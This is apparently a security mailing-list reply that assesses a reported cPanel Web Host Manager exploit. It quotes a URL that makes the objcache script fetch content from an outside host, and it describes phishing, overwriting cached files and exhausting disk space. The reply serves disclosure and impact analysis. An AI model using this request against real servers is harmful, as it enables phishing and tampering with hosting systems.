ali@xxxxxxxxxx wrote: > name : web host manager > vendor : cpanel.net > by : s3rv3r_hack3r (ali [at] hackerz [dot] ir) > web-site : www.hackerz.ir - ali.hackerz.ir > exploit: > http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/? > > I have confirmed that this does in fact work once you are authenticated, however the default behavior of cpanel is to require the user to authenticate through a standard http authentication dialog box before they can access this location. If you click on cancel on the http auth dialog you are redirected to the login screen instead. Additionally, some quick testing shows that the included file is not parsed in any form, it is just passed through to the browser. I suppose this could be used to trick a user into into submitting their user information into an official looking form for some basic phishing, but that is about all I can really see this could be used for. Some double checking has discovered that if you pass a file to this location (objcache=http://www.example.com/test.txt) the system will cache the contents of the test.txt in a file named test.txt located in /var/cpanel/objcache. A quick thought... that it might be possible to use a large file to exhaust space in the /var partition (if there was one) assuming that objcache doesn't do any sort of bounds checking on the size of the file. Additionally, it is possible to overwrite existing files in that directory by matching the name of a file already in that directory. I was able to replace the contents of the file whmnews with my own content included via this method. Tom Walsh Express Web Systems, Inc.
